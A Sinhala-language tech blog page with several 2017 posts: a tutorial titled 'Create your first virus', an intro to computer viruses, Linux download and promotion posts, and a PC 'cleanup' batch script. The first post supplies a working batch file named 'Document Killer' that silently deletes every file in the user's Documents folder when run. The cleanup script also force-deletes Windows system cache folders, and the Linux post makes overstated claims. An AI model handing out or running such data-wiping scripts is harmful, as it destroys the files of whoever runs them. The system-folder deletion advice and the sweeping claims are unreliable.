Thursday, October 5, 2017

Create your first virus (වයිරස් හදමු ප්‍රථම පාඩම.)



වයිරස් එකක් කියන්නෙ මොකක්ද කියල හැදින්වීමෙදී කියල දුන්න ඔයාලට මතක ඇති කියල මම හිතනව.
ඉතින් දැන් අපි බලමු වයිරස් එකක් නිර්මාණය කරන්නේ කොහොමද කියල.ඇත්තටම මෙතනදී මම ඔයාට දෙන්න යන්නේ සරල ගනයේ වයිරස් එකක් සරලවම කියුවොත් මේ වයිරස් එකෙන් වෙන්නේ මේකයි. ඔයාගෙ පරිගණකයේ  Document කියල ෆෝල්ඩර් එකක් තියෙනව නේද...? ඉතින් මේකෙන් අන්න ඒකට තමයි වැඩේ දෙන්නෙ… ඉතින් මේක කවුරුහරි රන් කලොත් එයාගෙ පරිගණකයේ  Document එක  Delete වෙනව. ඒ වගේම තමයි Document එක  ඇතුලෙ තියෙන හැමදේම මේකෙන් Delete වෙනව.
එහෙනම් වැඩේට බහිමු.
ඔයා දන්නව ඇතිනේ අපි මේ වැඩේට ගන්නේ නෝට් පෑඩ් (note pad) එක කියල. එහෙනම් පහත රතු පාටින් දීල තියෙන කෝඩ් එක නෝට් පෑඩ් එකට  copy, past කරගන්නකෝ...

@echo off
color c
title ~      Document Killer     ~     Presented By Pariganaka Lookayoo     ~
cd c:\users
attrib -h -s -r -a %userprofile%\documents
del %userprofile%\documents /s /q
exit

දැන් File මෙනු එක ක්ලික් කරල එන මෙනු එකෙන් Save As කියන විකල්පය තෝරන්න.
Save As කලාම එන Box එකෙහි File name එකට ඔයා කැමති නමක් දීල අගට" .bat " කියන file extinction එක  type කරල  save ක්ලික් කරන්න.

උදාහරණයක් විදියට ඒක මම Document.BAT කියල save කරනව.

Short intro about Virus (වයිරස් පිළිබඳව කෙටි හැදින්වීමක්...)



ඔයා පරිගණකයක් පාවිච්චියට ගන්නා අයෙක් නම් ඔයත් අනිවාර්යෙන්ම බයවෙන වචනයක් තමයි මේ වයිරස් කියන්නෙ.

ඇත්තටම මොකක්ද මේ වයිරස් කියන්නෙ...?

වයිරස් කියන්නේ විශබීජ , එහෙමත් නැත්නම් රෝග කාරක කියල කියන්නත් පුළුවන්.මොනවද මේ රෝගකාරක…? පරිගණකයටත් ලෙඩ හැදෙනවද…? අරකයි මේකයි කියල ප්‍රශ්න නම් තියෙන්න පුළුවන්. ඇත්තටම පරිගණක වයිරසයක් කියන්නේ කිසියම් පුද්ගලයකු හෝ පුද්ගල කණ්ඩායමක් විසින් හෝ යම්කිසි අරමුණක් සඳහා නිර්මාණය කරන ලද අතිශය විනාශකාරි පරිගණක වැඩසටහන් වර්ගයක් කියල පොඩි අදහසක් දෙන්න පුලුවන්.

වයිරස වර්ග මොනවාද...?

ඔව් ඔයා  Short Cut, Autorun, Trojan, Malware, Ransom වගෙ විවිද නම් වලින් එයාලව දන්නව. ප්‍රධාන වශයෙන් විනාශකාරි සහ රැවටිලිකාරී කියල වයිරස් වර්ග 02 ක් අපිට අදුරගන්න පුළුවන්.

1 - විනාශකාරි වයිරස…

            මේ වර්ගයට අයත් වයිරස මගින් සිදුකරන්නේ පරිගණකය පාවිච්චි කරන පුද්ගලයා සතු පුද්ගලික දත්ත සහ තොරතුරු සොරකම් කිරීමයි…  ඒ වගේම තමයි මේ වයිරස් මගින් පරිගණකයේ මෘදුකාංග මෙන්ම දෘඪාංග වලටත් බොහෝ සේ හානිදායකයි. මේ වයිරස් වලින් පද්ධති ගොණු වෙනස් කිරීම, මැකීම, පුද්ගලික දත්ත සොරකම් කිරීම ආදිය සිදුකරයි. Trojan, Malware, Ransom වගේ වයිරස් මේ කණ්ඩායමට අයත් වේ.

2 - රැවටිලිකාරී වයිරස…

            මේ වර්ගයට අයත් වයිරස මගින් සිදුකරන්නේ පරිගණකය පාවිච්චි කරන පුද්ගලයා මුලාවට පත්කිරීමයි. මේවාට ෆේක් වයිරස් එහෙමත් නැත්නම් prank වයිරස් කියලත් කියනව(prank virus). ඒ කියන්නේ මේවා වලින් ඔයාගෙ පරිගණකයට, ඔයාගෙ දත්ත වලට හානියක් කරන්නේ නෑ... ඒ උනාට මේ වර්ගයේ සමහරක් වයිරස් තියෙනව ඒ වයිරස් එක මගින් පරිගණකයට හානියක් සිදු නොකලත් user අතින් වයිරස් එකකට වඩා විනාශයක් පරිගණකයට සිදු කරගන්නා ආකාරයට සකස්කරල තියෙනව.

මේ වයිරස් පැතිරෙන්නේ  කොහොමද…?

ඇත්තටම මේ වයිරස බොහොමයක්ම බලපාන්නේ  windows තියෙන  pc වලට තමයි. ප්‍රතිශතයක් විදියට ගත්තොත් ලංකාවේ නම් 99.9ක් දෙනා පාවිච්චි කරන්නේ  windows පරිගණක තමයි. අන්න ඒ නිසාම තමයි මේ වයිරස පැතිරීමත් ඉහල අගයක් ගන්නේ.

පරිගණකයට වයිරස් ආවම මොකද වෙන්නේ...?

ඔයාගෙන් මම පොඩි ප්‍රශ්නයක් අහන්නම්. ඔයාට උනක්, හෙම්බිරිස්සාවක් එහෙම හැදිල තියෙනව නේද, ඉතින් ඔයා ඒ විදියට අසනීපෙන් ඉන්නකොට ඔයාට පුරුදු විදියට වැඩ කරගෙන යන්න බැහැ නේද,ඉතින් ඒ ලෙඩ නිසා ඔයාගෙ සාමාන්‍ය ක්‍රියාකාරිත්වයට බාධා ඇතිවෙනව. අනේ ඉතින් පරිගණක වයිරස් එකත් කරන්නෙ ඔය වැඩේම තමයි. ඒ කියන්නෙ පරිගණකයේ සාමාන්‍ය ක්‍රියාකාරිත්වයට බාධා ඇති කරන එක තමයි.

 ඉතින් මේ වයිරස් වලින් පරිගණකය ආරක්ශා කරගන්නේ කොහොමද...?


උත්තරය සරලයි.එක්කෝ ඔයා  windows වලට බායි කියන්න ඕන. නැත්තං pen වගේ Removable Device හොදට පරීක්ෂා කරල පාවිච්චි කරන්න ඕන. නැත්තං ඔයා දිනපතාම වගේ යාවත්කාලීන (upgrade) කරන virus guard එකක්  use කරන්න ඕන. දිනපතාම බැරිනම් අඩුමතරමෙන් මාසෙකට සැරයක්වත් ඔයා ඔයාගෙ වයිරස් ගාඩ් එක upgrade කරන එක අනිවාර්ය කාරණාවක්. ඒත් ලංකාවේ නම් බොහෝදුරට මේ දේ වෙනව නම් අඩුයි. බොහෝදුරට මේ එකක්වත් වෙන්නෙ නෑ කියල 200% ශුවර් කරල කියන්න උනත් පුළුවන්...


Monday, September 18, 2017

Let's download Linux distro (ලිනක්ස් මෙහෙයුම් පද්ධතියක් ලබා ගන්නා ආකාරය)






මොකක්ද මේ ඩිස්ට්‍රෝ...?

ඩිස්ට්‍රෝ? මොකක්ද දෙයියනේ ඒ? ඔයාට ඔය නම දැකපු ගමන් ඔහොම හිතෙන්න පුළුවන්. බයවෙන්න එපා මෙතන අමුතු දෙයක් නෑ... මෙතන ඩිස්ට්‍රෝ කියන්නෙත් මෙහෙයුම් පද්ධතිය කියන එකම තමයි. වින්ඩොස් වලදි අපි මෙහෙයුම් පද්ධතිය , OS කියන වචනයම තමයි ලිනක්ස් වලදි ඩිස්ට්‍රෝ කියල කියන්නෙත්.

ලිනක්ස් ගැන කතාකරන විට අපිට මෙහෙයුම් පද්දති හෙවත් ඩිස්ට්‍රෝ කිහිපයක් පිළිබඳව සඳහන් කරන්නම ඕන. ඒ අතරිනුත් ප්‍රධාන වශයෙන් කතාබහ කරන මෙහෙයුම් පද්දති ඒ කියන්නෙ ලිනක්ස් ඩිස්ට්‍රෝ තියෙනව...
ඔව් , එහෙම කියුව ගමන් ඔයාගෙ මතකෙට එන්නේ  Linux සහ  Ubuntu කියන මෙහෙයුම් පද්දති දෙක ගැන නේද?
ඔව් ඇත්තෙන්ම මම මේ කතා කරන්නෙත් ඒ ගැන තමයි
ඇත්තෙන්ම ලිනක්ස් සහ උබුන්ටු යන ඩිස්ට්‍රෝ ගත්කල මෙම ලිපිය රචනා කරන අද වන විට සංස්කරණයන් රාශියක් එළිදක්වා ඇති අතර උබුන්ටු ඩිස්ට්‍රෝවෙහි 17.4 වෙනි සංස්කරණයත් ලිනක්ස් මින්ට් ඩිස්ට්‍රෝවෙහි සංස්කරණ 18.2  දක්වාත් නිකුත් කර ඇත.

උබුන්ටු ලබා ගන්නා ආකාරය…

පහල ඇති  මේ ලිංක් එකෙන් ඔයාට අවශ්‍ය උබුන්ටු සංස්කරණය තෝරා ගන්න පුළුවන්.




ලිනක්ස් මින්ට් ලබා ගන්නා ආකාරය…

පහල ඇති  මේ ලිංක් එකෙන් ඔයාට අවශ්‍ය ලිනක්ස් මින්ට් සංස්කරණය තෝරා ගන්න පුළුවන්.




ඉදිරි කටයුතු සදහා ඉහත ලින්ක් මගින් ඔබේ ඩිස්ට්‍රෝව ලබාගන්න.


Why Linux is so good






There are many reasons to choose Linux as your operating system. Keep reading the article ... and you'll understand…

Get it for free ...

If you're using a commercial operating system like Windows, you might say I'm not paying for Windows. Do you think the story is true?
Imagine you're using a desktop, laptop, or laptop that comes with Windows, rather than a computer. Or are you somebody who used a cracked operating system.
If Linux offers you everything for free, why pay? Why steal?


Forget the virus…

Have you formatted your computer multiple times because of viruses?
Try it out. 99.99% of the existing computer viruses are viruses that affect Windows. So you don't have to worry about this computer virus since you came to Linux ...
You can forget about the viruses ...

No need for new computers…

If you want to use the new Windows operating system, you have to update your existing computer, or delete it.
So why is that?
The reason is that Windows requires the latest hardware to run the new system. Just a little example ...
Let's say you have a Pentium 3 or a Pentium 4 computer. So you want to install it on Windows 8 or 10. Can you say it yourself? Whatever you are, can p3 / p4 put Windows 10 on it? No ...
So, what's more, it's the finish line.
But in Linux this is not the problem. Because Linux is designed to be compatible with any computer ...

Drivers don't need ...

This is a problem with most Windows computers.
Do you find drives in Windows?
But the problem with this driver is that there is no Linux in this ...
Because all of the drivers we use frequently are on Linux,


No need to look for software…

In Windows you have problems with software ... nobody can say if you want new software, a crack, you don't have to carry around a hard, pen. Because everybody knows that.
But in Linux it's not ...
Because in the Linux system, all the essential software is included. Or you can get the software you want with just one click.

Can work with Windows software ...

If you already have special Windows software that you can't afford, you can get rid of them in Linux. Or you can use the software that you use on Windows.

You can also change whatever you want ...

Unlike Windows, Linux is a free and open-source operating system that you can customize and use to suit your needs.

Computer speed and stability and reliability…

A computer with a Linux system is faster, more stable, and more reliable than a computer with a Windows system.

Being able to work in multiple sites instead of multiple windows ...

On a computer with a Windows system you can work with a lot of people on one desktop. But on a computer with Linux, you can work from a few desktops to a whole host of different desktops. Simply put, this desktop can work on several Windows computers.

Get all the advice for free ...

They're ready to tell you anything for free on Linux, unlike Windows. Imagine that you can find out everything you need to know how to work in Linux and how to change the Linux kernel.



There are many more reasons to switch to Linux. So take a good look. Make the right decision for yourself. Join with Linux.

----------------------------------------------------------------------------------------------
ඇයි ලිනක්ස් මෙච්චර හොඳ?

ලිනක්ස් ඔබගේ මෙහෙයුම් පද්ධතිය ලෙස තෝරා ගැනීමට හේතු බොහෝමයක් තියෙනවා. ලිපිය දිගටම කියවන්නකෝ... එතකොට ඔයාටම තේරෙයි…

නොමිලේ ම ලබාගන්න පුළුවන්...

ඔයා වින්ඩොස් වගේ වාණිජමය මෙහෙයුම් පද්ධතියක් පාවිච්චි කරනව නම් මම නම් වින්ඩොස් වලට ගෙවලා නෑ කියනව වෙන්න පුළුවන්. ඔයාම හිතල බලන්න ඒ කතාව ඇත්තද කියල.
ටිකක් හිතන්න,ඔයා පාවිච්චි කරන්නේ වින්ඩොස් සමගම ආපු ඩෙක්ස්ටොප්,ලැප්ටොප් එකක් නම් පරිගණකයේ ගානට වඩා වින්ඩොස් වලට ගෙවපු කෙනෙක්. එහෙමත් නැත්ත්ං ඔයා කවුරුහරි ක්‍රැක් කරපු ඒ කියන්නේ මංකොල්ලකාපු මෙහෙයුම් පද්ධතියක් පාවිච්චි කරන කෙනෙක්.
ලිනක්ස් ඔයාලට නොමිලේ සෑමදෙයක්ම ලබාදෙනව නම් ඇයි මුදල් ගෙවන්නේ? ඇයි හොරකන් කරන්නේ?


වෛරස්  අමතක ම කරන්න…

වයිරස් නිසා ඔයා ඔයාගෙ පරිගණකය කීපාරක් නම් ෆෝමැට් කලාද?
චුට්ටක් හිතල බලන්න. දැනට තියෙන පරිගණක වයිරස් වලින් 99.99% ම තියෙන්නේ  වින්ඩොස් වලට බලපාන වයිරස් තමයි. ඉතින් ඔයා ලිනක්ස් වලට ආපු දවසෙ ඉදන් මේ පරිගණක වයිරස් ගැන වදවෙන්න ඕනෙම නෑ...
ඔයාට පුළුවන් කරදරකාරී වයිරස් ගැන අමතක ම කරන්න...

අළුත් පරිගණක ඕනේ  නෑ…

වින්ඩොස් වල අලුත් මෙහෙයුම් පද්දතියක් එනකොට ඔයාට එ අළුත් වින්ඩොස් මෙහෙයුම් පද්දතිය පාවිච්චි කරන්න ඔන නම් හුගක් වෙලාවට ඔයාගෙ දැන් තියෙන පරිගනකය අප්ඩේට් කරන්න වෙනව,නැත්තං අයින් කරන්න වෙනව ඒ කතාව ඇත්ත නේද?
ඉතින් ඇයි එහෙම වෙන්නේ?
හේතුව තමයි වින්ඩොස් නව පද්ධතිය ක්‍රියාත්මකවීම සදහා ඉල්ලන්නේ අළුත්ම දෘඪාංග. පොඩි උදාහරණයක් එහෙමත් දෙනංකෝ...
අපි හිතමු ඔයා ලග තියෙනව කියල පෙන්ටියම් 3 නැත්තං පෙන්ටියම් 4 වර්ගයේ පරිගණකයක්. ඉතින් ඔයාට ඕන ඒකට වින්ඩොස් 8 හෝ 10 වගේ මෙහෙයුම් පද්ධතියක් දාන්න. ඔයාම කියන්න, දාන්න පුළුවන්වෙයිද? ඔයා මොනවගේ වැඩ්ඩෙක් උනත්  p3 / p4 එකකට වින්ඩොස් 10 දාන්න පුළුවන්ද? බෑ නේද...
ඉතින් තව මොන කතාද ගේම එතනින්ම ෆිනිෂ්.
ඒත් ලිනක්ස්වලදි නම් ඔය ප්‍රශ්නය නෑ. මොකද ලිනක්ස් මෙහෙයුම් පද්දති ඕනෑම පරිගණකයකට ගැලපෙන විදියට තමයි නිර්මාණය කරල තියෙන්නේ...

ඩ්‍රයිවස් ඕනෙත් නෑ...

හුගක් වින්ඩොස් පරිගණක වලත් තියෙන ගැටලුවක් තමයි මේ ඩ්‍රයිවස් ප්‍රශ්ණය.
වින්ඩොස් වලදී ඔයාට ඩ්‍රයිවස් හොයල හොයල හතිවැටිල ඇති නේද?
ඒත් ඔය ඩ්‍රයිවස් ප්‍රශ්ණය නම් මේ ලිනක්ස් වලදි ඇත්තෙම නෑ...
මොකද අපි නිතර පාවිච්චි කරන සියලුම ඩ්‍රයිවස් ලිනක්ස්වලම  තියෙන නිසා..


මෘදුකාංග හොයන්න ඕනෙත් නෑ…

වින්ඩොස් වලදී ඔයාට මෘදුකාංග පිළිබඳව ප්‍රශ්න තියෙනවනේ... අළුත් මෘදුකාංගයක්, ක්‍රැක් එකක් එහෙම ඕන උනොත් හාඩ් එකක්, පෙන් එකක් උස්සගෙන වටේයන්න වෙලා නෑ කියන්න කාටවත් බෑ. මොකද එහෙම වෙනව කියල කවුරුත් දන්නව.
ඒත් ලිනක්ස් වලදී නම් එහෙම වෙන්නේ නෑ...
මොකද ලිනක්ස් වල පද්දතිය තුලම අත්‍යවශ්‍ය මෘදුකාංග අන්තර්ගත කරල තියෙනව. එහෙමත් නැත්තං එක ක්ලික් එකකින් අවශ්‍ය මෘදුකාංග ගන්න පුළුවන් විදියට සකස්කරල තියෙනව.

වින්ඩොස් මෘදුකාංග සමගත් කටයුතු කරන්න පුළුවන්...

ඔයාට දැනටමත් අතඇරගන්න බැරි විශේෂ වින්ඩොස් මෘදුකාංග තියෙනවා නම් ඒවට විකල්පත් ලිනක්ස් වල තියෙනවා. එහෙමත් නැත්නම් වින්ඩොස් වල ඔයා පාවිච්චි කල මෘදුකාංග භාවිතා කරන්නත් ලිනක්ස්වල පහසුකම් සලසල තියෙනව.

අවශය විදිහට ඕනෑ දෙයක් වෙනස් කරමින් වැඩ කරන්නත් පුළුවන්...

වින්ඩොස් වගේ නෙවෙයි, ලිනක්ස් කියන්නෙ නිදහස් සහ විවුර්තකේත මෙහෙයුම් පද්දතියක් නිසා ඔයාගේ අවශ්‍යතා සඳහා ගැලපෙන විදියට ඔයාට කැමති ආකාරයකට පද්දතිය වෙනස්කරගන්නත්,පාවිච්චි කරන්නත් පුළුවන්.

පරිගණකයේ වේගය සහ ස්තාවරත්වය සහ විශ්වාසයනීයත්වය…

වින්ඩොස් පද්ධතියක් ඇති පරිගණකයකට වඩා ලිනක්ස් පද්ධතියක් ඇති පරිගණකයක්  වේගය අතින් , ස්තාවරත්වය අතින් සහ විශ්වාසය අතින් ඉහලය.

කවුළු රාශියක් වෙනුවට වැඩබිම් කිහිපයක වැඩ කිරීමට හැකිවීම...

වින්ඩොස් පද්ධතියක් ඇති පරිගණකයක වැඩකටයුතු සිදුකල හැක්කේ එක් ඩෙක්ස්ටොප් එකක් මත කව්ළු රාශියක් භාවිතා කරගෙනය. නමුත් ලිනක්ස් පද්දතියක් ඇති පරිගණකයක ඩෙක්ස්ටොප් කිහිපයක සිට ඒ එක් එක් ඩෙක්ස්ටොප් එකකට අදාලව කව්ළු රාශියකින් වැඩකල හැකිය. සරලව කිවහොත් වින්ඩොස් පරිගණක කිහිපයක කටයුතු මෙම ඩෙක්ස්ටොප් මගින් සිදුකරගතහැකිය.

සියළුම උපදෙස් නොමිලේම ලබාගත හැකිවීම...

වින්ඩොස් වල වගේ නෙවෙයි ලිනක්ස් වලදී ඔයාට ඕනම දෙයක් නොමිලේම කියාදෙන්න මොවුන් සූදානම්. මෙහෙම හිතන්නකො ඔයාට ලිනක්ස්වල වැඩකරන විදිය වගේම ලිනක්ස් කර්ණලය වෙනස්කිරීම දක්වා වූ ඕනෑම දෙයක් නොමිලේම දැනගන්න පුළුවන්.



ලිනක්ස් වලට මාරුවෙන්න නම් මේ වගේ තවත් හේතු ගොඩක් තියෙනව. ඉතින් හොඳට හිතල බලන්න. හරි තීරණයක් ඔයත් අරගන්න. ලිනක්ස් සමග එකතුවෙන්න.


Thursday, September 14, 2017

How to speedup your pc? ඔබේ පරිගණකයත් Slow වෙලාද?




පරිගණකයක් හරියට ක්‍රියා නොකිරීම තරම් සිත කුපිත කරවන තවත් කරුණක් නැති තරම්ය. පරිගණක පරිශීලකයන් අතර නිතරම අසන්නට ලැබෙන ප්‍රබලතම ගැටළුවක් තමයි  slow වීම කියන්නේ. ඉතින්, ඔයාටත් මේ ගැටළුවට අනන්තවත් වෙලා ඇති.
පරිගණකයක්  slow වීම සදහා ප්‍රදානතම කරුණු කිහිපයක් ඇති අතර ඒ සඳහා බලපාන ප්‍රදාන කාරණයක් වනුයේ C drive එක full වීමයි. හුගක් වෙලාවට C drive එක full වෙන්නේ අපි install කරන software නිසාම නෙවෙයි කියල ඔයා දන්නවනෙ.
ඒ අපි install කරල තියෙන මෘදුකාංග වල (Tempery Files) තාවකාලික ෆයිල් නිසා තමයි හුගක්ම වෙලාවට  C drive එක පිරෙන්නෙ.
ඉතින් මේ ලිපියෙන් අරගෙන ආවේ ඒ තාවකාලික ෆයිල් වලට විසදුමක්. ඒ  තමයි මේ  CleanUp කියන පොඩි ෆයිල් එක.කරන්න තියෙන්නෙ පොඩි වැඩයි.

·        මුලින්ම Note Pad එක Open කරගන්න.

·        දැන් පල්ලෙහා කොළපාටින් තියෙන text ටික Copy කරගෙන Note Pad එකට Past කරගන්න.
echo off
color b
Title CleanUp  ( Pariganaka Lookayoo.blogspot.com )
del /s /f /q %windir%\temp\*.*
rd /s /q %windir%\temp
md %windir%\temp
del /s /f /q %windir%\Prefetch\*.*
rd /s /q %windir%\Prefetch
md %windir%\Prefetch
del /s /f /q %windir%\system32\dllcache\*.*
rd /s /q %windir%\system32\dllcache
md %windir%\system32\dllcache
del /s /f /q %temp%\*.*
rd /s /q %temp%
md %temp%
cls
echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
echo                            Pariganaka Lookayoo.Blogspot.Com
echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
timeout /t 10 /nobreak
·        දැන් File click කරල Save As click කරන්න
(පහත රූපය බලන්න.)


·        එන Save As බොක්ස් එකෙහි File Name සඳහා CLEANUP.BAT ලෙස type කරන්න.

·        Save As Type එක සඳහා All Files ලෙස තෝරා දෙන්න.

·        දැන්  save බටනය click කරන්න


දැන් ඔයාට ඕනම වෙලාවක මේ file එක run කරල තාවකාලික ෆයිල්ස් ඉවත්කරගන්න පුළුවන්.